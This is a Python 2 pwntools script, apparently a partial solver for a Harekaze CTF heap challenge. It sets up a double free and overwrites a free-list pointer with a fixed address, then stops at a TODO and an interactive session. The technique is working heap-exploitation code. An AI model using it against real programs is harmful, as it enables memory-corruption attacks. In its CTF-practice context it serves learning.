#!/usr/bin/python
# CTF solver script for the binary ./flea_attack.elf (Harekaze CTF task).
# Python 2 only: uses print statements, raw_input() and the pwntools 2-era API.
# The whole file is a flat, top-level script; nothing is wrapped in a function,
# so importing it starts the target process immediately.
import pwn
from pwn import *
# Local process by default; the remote endpoint is kept commented out.
p = pwn.process("./flea_attack.elf")
# p = pwn.remote("problem.harekaze.com",20175)
# Pause so a debugger can be attached to the child before any input is sent.
raw_input("<ATTACH NOW>")
p.recv()
# the size is 0x04.
# First input: 94 'A' bytes followed by a single 0x41 byte. The author's
# comment says the contents of this line do not matter for the later steps.
p.sendline( ("A"*94 ) + p8(0x41)) # no-one cares
# Menu convention inferred from the script's own prints below:
#   "1" followed by a size and a payload  -> allocate (target echoes "Addr: <hex>")
#   "2" followed by a hex address         -> free that address
# Each "Addr: " line is parsed as a hex integer and kept for later use.
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
buf = "AAAA"
p.sendline(buf)
p.recvuntil("Addr: ")
basechunk = int(p.recvuntil("\n").rstrip(),16)   # address of the first 50-byte allocation
print " PUTTING IN NEW CHUNK OF 50 FOR DEBUG"
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
p.sendline("lol")
p.recvuntil("Addr: ")
basechunk2 = int(p.recvuntil("\n").rstrip(),16)  # address of the second 50-byte allocation
print " ADDRESS OF CHUNK1 AT: %x" % basechunk
print " ADDRESS OF CHUNK2 AT: %x" % basechunk2
print "ALLOCATING ONE MORE FOR GOOD MEASURE..."
# Third allocation; its address is not read back or used anywhere below.
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
p.sendline("lol")
raw_input("<STOP1>")   # second debugger breakpoint, before the frees start
# Free sequence: basechunk, then basechunk2, then basechunk again. The same
# address is released twice, which is the memory-safety bug this script
# exercises (the target evidently does not reject a free of an address that
# is no longer live). The author's print says the free of basechunk2 in
# between is what lets the second free of basechunk pass a check in the target.
p.recvuntil(">")
print " FREEING ORIGINAL CHUNK at %x" % basechunk
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk))
p.recvuntil(">")
print " FREEING SECOND CHUNK TO SKIP SECURITY CHECK at %x" % (basechunk2)
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk2))
p.recvuntil(">")
# p.interactive()
print " FREEING ORIGINAL CHUNK AGAIN at %x" % basechunk
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk))
p.recvuntil(">")
raw_input("<STOP2>")   # third debugger breakpoint, after the double free
print " SETUP: ALLOCATING FIRST CHUNK WITH NON-ZERO FD PTR"
# Note: unlike the earlier allocations, no p.recv() is done between "1" and
# the size here; the script relies on the target accepting both lines back to back.
p.sendline("1")
p.sendline("50")
# Payload is the constant 0x204056 packed as 8 little-endian bytes (p64).
# What that value is meant to address is not stated anywhere on this page.
buf = p64(0x204056)
p.sendline(buf)
p.recvuntil("Addr: ")
explsetup = int(p.recvuntil("\n").rstrip(),16)   # address returned for the p64 payload allocation
print " SETUP: ALLOCATING SECOND CHUNK (TO GET FIRST CHUNK BACK TO FREELIST HEAD)"
p.recvuntil(">")
p.sendline("1")
p.sendline("50")
p.sendline("bbbb")
p.recvuntil("Addr: ")
idgaf = int(p.recvuntil("\n").rstrip(),16)        # parsed but never used afterwards
print " OK, REALLOCATING OVER FIRST CHUNK'S FD..."
p.recvuntil(">")
p.sendline("1")
p.sendline("50")
p.sendline("cccc")
p.recvuntil("Addr: ")
explchunk = int(p.recvuntil("\n").rstrip(),16)   # address returned for the third post-free allocation
p.recvuntil(">")
# The two prints below let the author compare the addresses handed out after
# the double free; the script stops here with the author's TODO and hands the
# session over to the user. The remaining steps are not on this page.
print " FIRST CHUNK REALLOCATE #1: %x" % explsetup
print " FIRST CHUNK REALLOCATE #2: %x" % explchunk
# reallocate 50, then add in "A"'s...
p.interactive()